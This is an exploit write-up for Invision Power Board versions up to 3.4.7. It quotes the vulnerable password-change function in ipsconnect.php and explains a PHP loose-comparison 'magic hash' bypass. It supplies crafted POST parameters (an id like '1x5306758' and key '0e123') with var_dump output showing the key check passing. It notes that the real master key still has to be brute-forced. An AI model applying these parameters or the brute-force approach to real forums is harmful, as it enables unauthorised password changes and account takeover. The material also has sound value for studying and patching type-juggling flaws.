# Exploit Title: Invision Power Board <= 3.4.7 password change # Date: 25.11.2014 # Exploit Author: ZeroDay # Software Link: http://www.invisionpower.com/ # Version: <= 3.4.7 # Tested on: 3.4.7 # About: For the G-Owl with Love vuln code interface/ipsconnect/ipsconnect.php public function change( $id, $key, $username, $displayname, $email, $md5Password, $redirect, $redirectHash ) { if ( $key != md5( $this->masterKey . $id ) ) { $this->_return( base64_encode( $this->settings['board_url'] ), array( 'status' => 'BAD_KEY' ) ); } $member = IPSMember::load( intval( $id ), 'none', 'id' ); if ( !$member['member_id'] ) { $this->_return( $redirect, array( 'status' => 'NO_USER' ) ); } ... if ( $key != md5( $this->masterKey . $id ) ) An incorrect comparison != is used in this line. If the $this->masterKey variable is "1234", then, to pass the comparison check successfully, we will have to send the POST parameters: id=1x5306758&key=0e123 - where "1x" is the user_id. var_dump(intval('1x5306758')); //int(1) var_dump(md5('1234'.'1x5306758')); //string(32) "0e206089892480803868366430752394" var_dump('0e123' == md5('1234'.'1x5306758')); //bool(true) BUT! Since the we do not know the $this->masterKey variable, the only things we will have to hope for are bruteforce and luck ;)